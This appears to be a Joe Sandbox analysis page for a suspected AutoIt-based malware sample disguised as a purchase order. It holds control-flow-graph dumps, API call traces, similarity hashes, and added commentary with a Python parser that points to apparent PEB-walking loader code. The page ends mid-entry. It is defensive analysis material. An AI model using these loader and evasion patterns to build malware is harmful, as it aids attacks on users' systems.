RegQueryValueExW 96002->96003 96004 f431d4 96003->96004 96007 f431ee ISource 96003->96007 96005 f06b57 22 API calls 96004->96005 96005->96007 96006 f04c6d 22 API calls 96006->96010 96007->95998 96008 f09cb3 22 API calls 96008->96010 96009 f0515f 22 API calls 96009->96010 96010->96000 96010->96006 96010->96008 96010->96009 96011->95979 96013 f41f50 __wsopen_s 96012->96013 96014 f03364 GetFullPathNameW 96013->96014 96015 f03386 96014->96015 96016 f06b57 22 API calls 96015->96016 96017 f033a4 96016->96017 96017->95988 96018 f0f7bf 96019 f0f7d3 96018->96019 96020 f0fcb6 96018->96020 96021 
f0fcc2 96019->96021 96023 f1fddb 22 API calls 96019->96023 96111 f0aceb 23 API calls ISource 96020->96111 96112 f0aceb 23 API calls ISource 96021->96112 96025 f0f7e5 96023->96025 96025->96021 96026 f0f83e 96025->96026 96027 f0fd3d 96025->96027 96050 f0ed9d ISource 96026->96050 96053 f11310 96026->96053 96113 f71155 22 API calls 96027->96113 96030 f0fef7 96037 f0a8c7 22 API calls 96030->96037 96030->96050 96033 f54600 96038 f0a8c7 22 API calls 96033->96038 96033->96050 96034 f54b0b 96115 f7359c 82 API calls __wsopen_s 96034->96115 96037->96050 96038->96050 96040 f0a8c7 22 API calls 96049 f0ec76 ISource 96040->96049 96041 f0fbe3 96043 f54bdc 96041->96043 96041->96050 96052 f0f3ae ISource 96041->96052 96042 f0a961 22 API calls 96042->96049 96116 f7359c 82 API calls __wsopen_s 96043->96116 96045 f20242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96045->96049 96046 f54beb 96117 f7359c 82 API calls __wsopen_s 96046->96117 96047 f1fddb 22 API calls 96047->96049 96048 f200a3 29 API calls pre_c_initialization 96048->96049 96049->96030 96049->96033 96049->96034 96049->96040 96049->96041 96049->96042 96049->96045 96049->96046 96049->96047 96049->96048 96049->96050 96051 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96049->96051 96049->96052 96109 f101e0 256 API calls 2 library calls 96049->96109 96110 f106a0 41 API calls ISource 96049->96110 96051->96049 96052->96050 96114 f7359c 82 API calls __wsopen_s 96052->96114 96054 f117b0 96053->96054 96055 f11376 96053->96055 96332 f20242 5 API calls __Init_thread_wait 96054->96332 96056 f11390 96055->96056 96057 f56331 96055->96057 96118 f11940 96056->96118 96061 f5633d 96057->96061 96337 f8709c 256 API calls 96057->96337 96059 f117ba 96063 f117fb 96059->96063 96065 f09cb3 22 API calls 96059->96065 96061->96049 96068 f56346 96063->96068 96070 f1182c 96063->96070 96074 f117d4 96065->96074 96066 f11940 9 API calls 96067 f113b6 
96066->96067 96067->96063 96069 f113ec 96067->96069 96338 f7359c 82 API calls __wsopen_s 96068->96338 96069->96068 96093 f11408 __fread_nolock 96069->96093 96334 f0aceb 23 API calls ISource 96070->96334 96073 f11839 96335 f1d217 256 API calls 96073->96335 96333 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96074->96333 96077 f5636e 96339 f7359c 82 API calls __wsopen_s 96077->96339 96078 f1152f 96080 f563d1 96078->96080 96081 f1153c 96078->96081 96341 f85745 54 API calls _wcslen 96080->96341 96083 f11940 9 API calls 96081->96083 96085 f11549 96083->96085 96084 f1fddb 22 API calls 96084->96093 96090 f11940 9 API calls 96085->96090 96098 f115c7 ISource 96085->96098 96086 f11872 96336 f1faeb 23 API calls 96086->96336 96087 f1fe0b 22 API calls 96087->96093 96088 f1171d 96088->96049 96094 f11563 96090->96094 96092 f0ec40 256 API calls 96092->96093 96093->96073 96093->96077 96093->96078 96093->96084 96093->96087 96093->96092 96095 f563b2 96093->96095 96093->96098 96094->96098 96101 f0a8c7 22 API calls 96094->96101 96340 f7359c 82 API calls __wsopen_s 96095->96340 96097 f11940 9 API calls 96097->96098 96098->96086 96098->96097 96100 f1167b ISource 96098->96100 96106 f04f39 68 API calls 96098->96106 96128 f76ef1 96098->96128 96208 f8958b 96098->96208 96211 f6d4ce 96098->96211 96214 f8959f 96098->96214 96217 f1effa 96098->96217 96274 f7744a 96098->96274 96342 f7359c 82 API calls __wsopen_s 96098->96342 96100->96088 96331 f1ce17 22 API calls ISource 96100->96331 96101->96098 96106->96098 96109->96049 96110->96049 96111->96021 96112->96027 96113->96050 96114->96050 96115->96050 96116->96046 96117->96050 96119 f11981 96118->96119 96120 f1195d 96118->96120 96343 f20242 5 API calls __Init_thread_wait 96119->96343 96121 f113a0 96120->96121 96345 f20242 5 API calls __Init_thread_wait 96120->96345 96121->96066 96124 f1198b 96124->96120 96344 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96124->96344 96125 f18727 96125->96121 96346 f201f8 
[Control-flow graph export (node and edge data behind the interactive graph viewer: node id, code address, label). The graph spans two memory regions:
• Main image (base 0x00F00000; CRT symbols such as __wsopen_s, __fread_nolock, _wcslen and __dosmaperr mark a statically linked MSVC runtime). API call sites: file and path handling (CreateFileW, ReadFile, WriteFile, SetFilePointerEx, CloseHandle, GetFileType, GetFileAttributesW, FindFirstFileW, FindClose, GetTempPathW, GetTempFileNameW, CopyFileW, DeleteFileW, GetLongPathNameW, GetOpenFileNameW, GetStdHandle); strings (lstrlenW, CharLowerBuffW, MultiByteToWideChar); synchronisation and threads (EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent, InitializeCriticalSectionAndSpinCount, InterlockedExchange, CreateThread, DuplicateHandle, WaitForSingleObject, GetExitCodeProcess); window and message handling (CreateWindowExW, ShowWindow, Shell_NotifyIconW, RegisterWindowMessageW, PeekMessageW, GetInputState, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, GetForegroundWindow, SystemParametersInfoW, OleInitialize); timing (timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep); process and module control (GetCurrentProcess, TerminateProcess, ShellExecuteW, SetCurrentDirectoryW, FreeLibrary, VirtualAlloc, GetLastError).
• Second region at 0x00EB0000 (nodes eb0000-eb354a, outside the image): GetPEB, CreateFileW, ReadFile, VirtualAlloc, VirtualFree, FindCloseChangeNotification, Sleep. Reading the PEB, then opening a file and copying it into self-allocated memory in a loop, is the shape of position-independent loader code that resolves APIs without an import table; FindCloseChangeNotification closes a handle through the same kernel path as CloseHandle and is a common substitute for it in such code. This region, not the runtime code in the main image, is the part of the graph to examine for the unpacking stage.]

                          Control-flow Graph

[Control-flow graph of function 00F042DE (basic-block ranges with their API calls; edges summarised):
f042de-f0434d: call f0a961, GetVersionExW, call f06b57 → f0435d-f043bc: call f093b2, call f037a0 → f0441b-f04435: GetCurrentProcess, IsWow64Process → f0443d-f04449 → either f43824-f43828: GetSystemInfo, or f0444f-f0445e: LoadLibraryA("kernel32.dll") → either f0449c-f044a6: GetSystemInfo (library load failed) or f04460-f0446e: GetProcAddress("GetNativeSystemInfo") → either f0449c-f044a6: GetSystemInfo (export not found) or f04470-f04474: GetNativeSystemInfo → f04476-f04478 → f0447a-f0447b: FreeLibrary → f04481-f04493. Blocks f43617-f437da make no API calls.
Resolving GetNativeSystemInfo through LoadLibraryA/GetProcAddress is the standard compatibility idiom for this export (it is absent on Windows releases before XP SP2), not an evasion trick; the block reads as host-runtime start-up code that records OS version, WOW64 state and native processor architecture, rather than payload logic.]
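The graph data on this page is the text export of the viewer's node/edge list: a numeric node id, a code address (or block range such as f042de-f0434d), an optional label (an API name, "N API calls", or a CRT symbol) and "src->dst" edges. The following Python is added here as an example and is not Joe Sandbox code or part of the report. It parses that export, splits the API call sites by memory region, and lists the APIs reachable from a chosen node. SAMPLE is an excerpt copied from this page's graph; IMAGE_RANGE is an assumed extent of the main image, taken from the memory-dump source lines (base 0x00F00000, sections up to 0x00FD4000).

```python
"""Parse Joe Sandbox's control-flow-graph text export (node id, code address,
optional label, src->dst edges) and pull out Win32 API call sites per region.

Added example for this report page, not Joe Sandbox code. SAMPLE is an excerpt
copied from the graph dump on this page; IMAGE_RANGE is an assumption read off
the memory-dump source lines (image base 0x00F00000, sections to 0x00FD4000)."""
import re
from collections import deque

# Constructed sample: verbatim excerpt of the page's graph dump (eb0000 region
# plus a few main-image nodes). Nodes 96128 and 97153 are defined elsewhere on
# the page, so their edges are dangling here; the parser keeps them as edges.
SAMPLE = (
    "96777 eb295b 96778 eb2962 96777->96778 96779 eb296a 96778->96779 "
    "96780 eb2a00 96778->96780 96784 eb2610 96779->96784 96797 eb32b0 9 API calls "
    "96780->96797 96783 eb29e7 96798 eb0000 96784->96798 96787 eb26e0 CreateFileW "
    "96788 eb26af 96787->96788 96791 eb26ed 96787->96791 96789 eb2709 VirtualAlloc "
    "96788->96789 96788->96791 96795 eb2810 FindCloseChangeNotification 96788->96795 "
    "96796 eb2820 VirtualFree 96788->96796 96801 eb3520 GetPEB 96788->96801 "
    "96790 eb272a ReadFile 96789->96790 96789->96791 96790->96791 "
    "96794 eb2748 VirtualAlloc 96790->96794 96792 eb290a 96791->96792 "
    "96793 eb28fc VirtualFree 96791->96793 96792->96783 96793->96792 96794->96788 "
    "96794->96791 96795->96788 96796->96788 96797->96783 96803 eb34c0 GetPEB "
    "96798->96803 96800 eb068b 96800->96788 96802 eb354a 96801->96802 96802->96787 "
    "96804 eb34ea 96803->96804 96804->96800 "
    "97140 f0db11 PeekMessageW 97140->97153 97141 f0d807 GetInputState 97141->97140 "
    "97154 f52c0b GetExitCodeProcess 97156 f52c37 CloseHandle 97154->97156 "
    "97157 f52c21 WaitForSingleObject 97154->97157 96129 f0a961 22 API calls 96128->96129"
)

IMAGE_RANGE = (0x00F00000, 0x00FE0000)  # assumed extent of the PO_987654345678.exe image
NODE_ID = re.compile(r"^\d+$")
ADDRESS = re.compile(r"^[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?$")  # f0a961 or f042de-f0434d
EDGE = re.compile(r"^(\d+)->(\d+)$")
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*$")  # Win32 export style; skips _wcslen, "calls"
NOT_API = {"API", "ISource", "CallCatchBlock"}  # sandbox annotations shaped like API names


def parse_cfg(text):
    """Return ({node_id: (address, label)}, [(src, dst), ...])."""
    tokens = text.split()
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (tokens[i + 1], [])
            i += 1  # consume the address token as well
        elif current is not None:
            nodes[current][1].append(tok)  # label fragment: API, "N API calls", CRT symbol
        i += 1
    return {k: (addr, " ".join(lbl)) for k, (addr, lbl) in nodes.items()}, edges


def apis_in(label):
    """API names in a node label; GetPEB (a PEB read, not an import) is kept on purpose."""
    return [t for t in label.split() if API_NAME.match(t) and t not in NOT_API]


def region_of(address):
    start = int(address.split("-")[0], 16)
    return "image" if IMAGE_RANGE[0] <= start < IMAGE_RANGE[1] else "outside_image"


def api_calls_by_region(nodes):
    """Sorted, de-duplicated API names called from each memory region."""
    found = {}
    for addr, label in nodes.values():
        found.setdefault(region_of(addr), set()).update(apis_in(label))
    return {region: sorted(names) for region, names in found.items()}


def node_by_address(nodes, address):
    return next((k for k, (addr, _) in nodes.items() if addr == address), None)


def reachable_apis(nodes, edges, start):
    """API names reachable from `start`, in BFS discovery order. This is
    reachability, not execution order: the back-edges of the read loop make
    VirtualAlloc appear before the CreateFileW that feeds it."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    seen, order, queue = {start}, [], deque([start])
    while queue:
        node = queue.popleft()
        if node in nodes:
            for api in apis_in(nodes[node][1]):
                if api not in order:
                    order.append(api)
        for dst in succ.get(node, []):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return order


if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for region, names in api_calls_by_region(nodes).items():
        print(f"{region}: {', '.join(names)}")
    loader = node_by_address(nodes, "eb2610")
    print("reachable from eb2610:", reachable_apis(nodes, edges, loader))
```

Run it against a saved copy of the full graph text rather than the excerpt: the region split separates the main image's runtime calls from the 0x00EB0000 region, and the reachability walk only tells you which API sites a block can reach, not the order in which the sample executed them.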
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00F0430D
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • GetCurrentProcess.KERNEL32(?,00F9CB64,00000000,?,?), ref: 00F04422
                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F04429
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F04454
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04466
                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F04474
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F0447B
                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00F044A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                          • API String ID: 3290436268-3101561225
                          • Opcode ID: 4a9c1035ee6ed631a0a4a01a5ea59fe1f13ff070002f3716c53c3892ca0d638b
                          • Instruction ID: be3c92eef7eb7e92de8c6e1420abc940ea42afd94f3f74d5392158bcdec60822
                          • Opcode Fuzzy Hash: 4a9c1035ee6ed631a0a4a01a5ea59fe1f13ff070002f3716c53c3892ca0d638b
                          • Instruction Fuzzy Hash: BFA1A5A6D0F2CCFFCB11CBB9BC416997FA7BB26310B08449BD98193A62D2305544FB61

                          Control-flow Graph

                          control_flow_graph 661 f042a2-f042ba CreateStreamOnHGlobal 662 f042da-f042dd 661->662 663 f042bc-f042d3 FindResourceExW 661->663 664 f042d9 663->664 665 f435ba-f435c9 LoadResource 663->665 664->662 665->664 666 f435cf-f435dd SizeofResource 665->666 666->664 667 f435e3-f435ee LockResource 666->667 667->664 668 f435f4-f43612 667->668 668->664
                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F050AA,?,?,00000000,00000000), ref: 00F042B2
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F050AA,?,?,00000000,00000000), ref: 00F042C9
                          • LoadResource.KERNEL32(?,00000000,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20), ref: 00F435BE
                          • SizeofResource.KERNEL32(?,00000000,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20), ref: 00F435D3
                          • LockResource.KERNEL32(00F050AA,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20,?), ref: 00F435E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: e038c8e8624bda86c00a2558445eceef40ef671b8fc1444bd02dfcb322777f38
                          • Instruction ID: 0a1f442044e95b5dba67e92e51fac25d4e9585a11aac53ee7a51f020c2cf123d
                          • Opcode Fuzzy Hash: e038c8e8624bda86c00a2558445eceef40ef671b8fc1444bd02dfcb322777f38
                          • Instruction Fuzzy Hash: 59118EB1700705BFEB218B65DC48F277BB9EBC5B61F14416AF502D6290DB71EC00A670

                          Control-flow Graph

                          APIs
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02B6B
                            • Part of subcall function 00F03A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FD1418,?,00F02E7F,?,?,?,00000000), ref: 00F03A78
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,00FC2224), ref: 00F42C10
                          • ShellExecuteW.SHELL32(00000000,?,?,00FC2224), ref: 00F42C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                          • String ID: runas
                          • API String ID: 448630720-4000483414
                          • Opcode ID: a8ce090a448a0d9b034f5f55068c331d185c34460e9551d4a843136fd669646b
                          • Instruction ID: 8b0764d727d820f46ffb844c3f5256bf06808eee970e9da56ce6cced94d7c624
                          • Opcode Fuzzy Hash: a8ce090a448a0d9b034f5f55068c331d185c34460e9551d4a843136fd669646b
                          • Instruction Fuzzy Hash: 981106716083456ACB04FF60DC56EBE77A9ABD2710F84442EF042421E3DF388649F762
                          APIs
                          • lstrlenW.KERNEL32(?,00F45222), ref: 00F6DBCE
                          • GetFileAttributesW.KERNELBASE(?), ref: 00F6DBDD
                          • FindFirstFileW.KERNELBASE(?,?), ref: 00F6DBEE
                          • FindClose.KERNEL32(00000000), ref: 00F6DBFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirstlstrlen
                          • String ID:
                          • API String ID: 2695905019-0
                          • Opcode ID: 5e47eb9a0622bc54d8af0d44f20f0ac2d20f987d739157cd61ed730fa32fa186
                          • Instruction ID: 72e5484ac0476ac675f47052e4ba95c39618940d792c84601af89c5f99f1dffa
                          • Opcode Fuzzy Hash: 5e47eb9a0622bc54d8af0d44f20f0ac2d20f987d739157cd61ed730fa32fa186
                          • Instruction Fuzzy Hash: B4F0E531C1091C57C220AB7CAC0D8AA376C9E01334B504703F836C20F0EBB15D94EAD9
                          APIs
                          • GetInputState.USER32 ref: 00F0D807
                          • timeGetTime.WINMM ref: 00F0DA07
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0DB28
                          • TranslateMessage.USER32(?), ref: 00F0DB7B
                          • DispatchMessageW.USER32(?), ref: 00F0DB89
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0DB9F
                          • Sleep.KERNEL32(0000000A), ref: 00F0DBB1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                          • String ID:
                          • API String ID: 2189390790-0
                          • Opcode ID: f05561ec6170fef3fe7c3c86cd1858e79d3ed2209d7dea5922b26948ef028812
                          • Instruction ID: 2b36c34c459c8c21aa745b117b033aa90fff0a9ec1777f6401e5a46d185f57ae
                          • Opcode Fuzzy Hash: f05561ec6170fef3fe7c3c86cd1858e79d3ed2209d7dea5922b26948ef028812
                          • Instruction Fuzzy Hash: B3422671A08345EFD728CF24C844BAAB7E1BF86324F14861EE955872D1D774E848FB92

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00F02D07
                          • RegisterClassExW.USER32(00000030), ref: 00F02D31
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F02D42
                          • InitCommonControlsEx.COMCTL32(?), ref: 00F02D5F
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F02D6F
                          • LoadIconW.USER32(000000A9), ref: 00F02D85
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F02D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: b3d8bfa2ef2d955cd0b24013a356088dccf73e0fc1a04b1958482ee2a576f7f5
                          • Instruction ID: d8c3dd85147fd9e33dbb1df9fa0298a4b8c9afd3f9b3d483ef646df18cfe8dfa
                          • Opcode Fuzzy Hash: b3d8bfa2ef2d955cd0b24013a356088dccf73e0fc1a04b1958482ee2a576f7f5
                          • Instruction Fuzzy Hash: 0321C3B590221CAFEB00DFA4E859BDDBBB9FB08700F00411BF511A62A0D7B54544EF92

                          Control-flow Graph

                          control_flow_graph 302 f4065b-f4068b call f4042f 305 f406a6-f406b2 call f35221 302->305 306 f4068d-f40698 call f2f2c6 302->306 312 f406b4-f406c9 call f2f2c6 call f2f2d9 305->312 313 f406cb-f40714 call f4039a 305->313 311 f4069a-f406a1 call f2f2d9 306->311 322 f4097d-f40983 311->322 312->311 320 f40716-f4071f 313->320 321 f40781-f4078a GetFileType 313->321 324 f40756-f4077c GetLastError call f2f2a3 320->324 325 f40721-f40725 320->325 326 f407d3-f407d6 321->326 327 f4078c-f407bd GetLastError call f2f2a3 CloseHandle 321->327 324->311 325->324 331 f40727-f40754 call f4039a 325->331 329 f407df-f407e5 326->329 330 f407d8-f407dd 326->330 327->311 341 f407c3-f407ce call f2f2d9 327->341 334 f407e9-f40837 call f3516a 329->334 335 f407e7 329->335 330->334 331->321 331->324 345 f40847-f4086b call f4014d 334->345 346 f40839-f40845 call f405ab 334->346 335->334 341->311 352 f4086d 345->352 353 f4087e-f408c1 345->353 346->345 351 f4086f-f40879 call f386ae 346->351 351->322 352->351 355 f408e2-f408f0 353->355 356 f408c3-f408c7 353->356 359 f408f6-f408fa 355->359 360 f4097b 355->360 356->355 358 f408c9-f408dd 356->358 358->355 359->360 361 f408fc-f4092f CloseHandle call f4039a 359->361 360->322 364 f40931-f4095d GetLastError call f2f2a3 call f35333 361->364 365 f40963-f40977 361->365 364->365 365->360
                          APIs
                            • Part of subcall function 00F4039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F40704,?,?,00000000,?,00F40704,00000000,0000000C), ref: 00F403B7
                          • GetLastError.KERNEL32 ref: 00F4076F
                          • __dosmaperr.LIBCMT ref: 00F40776
                          • GetFileType.KERNELBASE(00000000), ref: 00F40782
                          • GetLastError.KERNEL32 ref: 00F4078C
                          • __dosmaperr.LIBCMT ref: 00F40795
                          • CloseHandle.KERNEL32(00000000), ref: 00F407B5
                          • CloseHandle.KERNEL32(?), ref: 00F408FF
                          • GetLastError.KERNEL32 ref: 00F40931
                          • __dosmaperr.LIBCMT ref: 00F40938
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 87ab3db1822fbecf0cc44e858e59c6ae5fa50fdda1142ef1baf1611fdaccf50c
                          • Instruction ID: ddc9c8c9dd066ac6c4d805c1133ff9c6f767f91443cd07d989860126c57d3294
                          • Opcode Fuzzy Hash: 87ab3db1822fbecf0cc44e858e59c6ae5fa50fdda1142ef1baf1611fdaccf50c
                          • Instruction Fuzzy Hash: 7EA11432A101188FDF19AF78DC51BAE7FA1EB46320F24015AFD159B3D1DB359812EB91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00F03A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FD1418,?,00F02E7F,?,?,?,00000000), ref: 00F03A78
                            • Part of subcall function 00F03357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F03379
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F0356A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F4318D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F431CE
                          • RegCloseKey.ADVAPI32(?), ref: 00F43210
                          • _wcslen.LIBCMT ref: 00F43277
                          • _wcslen.LIBCMT ref: 00F43286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 98802146-2727554177
                          • Opcode ID: 6ac1b84d5eabc4840b4287655157428a80ce0ba9ccc9356d506e81ac9075058f
